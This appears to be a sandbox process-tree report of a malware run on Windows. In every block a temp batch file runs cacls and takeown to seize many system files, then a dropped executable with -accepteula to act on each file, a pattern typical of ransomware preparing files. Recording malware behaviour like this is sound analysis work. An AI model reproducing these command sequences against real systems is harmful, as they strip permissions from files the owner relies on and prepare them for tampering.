C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "BrowserCore.exe" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "BrowserCore.exe" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wab.exe" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "wab.exe" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wabmig.exe" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "wabmig.exe" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
